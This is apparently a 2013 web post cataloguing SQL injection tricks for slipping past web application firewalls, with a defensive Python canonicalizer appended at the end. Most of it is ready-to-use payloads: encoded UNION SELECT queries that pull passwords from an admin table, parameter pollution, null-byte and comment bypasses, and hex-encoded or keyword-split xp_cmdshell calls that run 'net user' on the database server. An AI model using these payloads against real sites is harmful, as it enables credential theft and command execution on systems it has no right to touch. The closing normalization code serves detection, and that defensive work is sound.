[SQL injection] Some WAF bypass techniques

DDos

22/10/2013
  • URL encode

    original payload: ?id=1 union select pass from admin limit 1


    encoded payload: id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31
  • Unicode encode

    original payload: ?id=1 union select pass from admin limit 1


    encoded payload: ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
  • HTTP parameter contamination (parameter pollution)/complex parameter bypass
    ?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28admin%29%29
    ?id=1&id=1/**/And/**/1=2/**/Union/**/Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,version%28%29%29,3
    ?id=1 union select 1&id=pass from admin
  • Special character contamination bypass

    // %00 is equivalent to NULL. The null character truncates the value, so the WAF's parsing of the URL parameter is cut off at that point.

    Replace spaces with /**/; And replaced with a %n%d, ;[NULL] ;%00 ;x00, ||, …
  • Search engine whitelist bypass, agent proxy bypass
  • Method bypass

    Change GET to POST, POST to GET …

    GET /id=1 union select 1,2,3,4

    POST id=1 union select 1,2,3,4
  • Encoding bypass (urlencoded/form-data)
  • The keyword split bypass

    ?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell "net user"')
  • Database special syntax bypass

    ?id=1.union%0aselect@1,2 ,!3,4
  • Use the comment statement to bypass

    UNION /**/ Select /**/user,pwd from tbluser
  • HEX bypass

    0x730079007300610064006D0069006E00 =hex(sysadmin)

    0x640062005F006F0077006E0065007200 =hex(db_owner)

    ?id=1;declare%20@a%20sysname%20select @a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;--
  • GET Parameter SQL Injection %0A Line Break Pollution Bypass

    ?id=-11%0Aunion%0Aselect 1,2,3,4
Source: kali-linux.co
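
From the defender's side, most of the encoding, comment, line-break, null-byte and duplicate-parameter variants listed above collapse to the same string once each parameter is canonicalized before inspection. The following Python is an added example, not part of the original post; the function names, the single demo signature and the comma-join model of duplicate parameters (ASP.NET behaviour) are assumptions.

```python
import re
from urllib.parse import unquote_plus

U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")      # non-standard %uXXXX escapes
COMMENT = re.compile(r"/\*.*?\*/", re.S)          # inline SQL comments such as /**/
# Deliberately minimal demo signature; a real rule set is far broader.
SIGNATURE = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.S)

def split_params(raw):
    """Split a raw query string or urlencoded body, keeping every duplicate name."""
    params = {}
    for pair in raw.lstrip("?").split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(unquote_plus(name), []).append(value)
    return params

def canonicalize(value, max_rounds=5):
    """Reduce a parameter value to the form the database is likely to receive."""
    for _ in range(max_rounds):                   # repeat to undo nested encoding
        decoded = U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote_plus(decoded)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\x00", "")             # drop NULs instead of truncating
    value = COMMENT.sub(" ", value)               # a comment acts as whitespace
    value = re.sub(r"\s+", " ", value)            # %0a, tabs and runs of spaces
    return value.strip().lower()

def inspect(raw):
    """Return (name, canonical value) for each parameter matching the signature."""
    findings = []
    for name, values in split_params(raw).items():
        # Assumption: the backend joins duplicates with "," (ASP.NET behaviour),
        # so inspect the joined value rather than only the first or last one.
        canonical = canonicalize(",".join(values))
        if SIGNATURE.search(canonical):
            findings.append((name, canonical))
    return findings

if __name__ == "__main__":
    # Constructed requests modelled on the payload shapes listed in the post.
    for raw in ("?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1",
                "?id=1 union select 1&id=pass from admin",
                "?id=-11%0Aunion%0Aselect 1,2,3,4",
                "?id=42&sort=name"):
        print(raw, "->", inspect(raw))
```

Run `inspect()` on both the query string and the request body so that switching between GET and POST changes nothing. Keyword splitting and hex literals are resolved by the database rather than at the HTTP layer, so request normalization does not see through them; parameterized queries are the control that closes the injection itself.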
 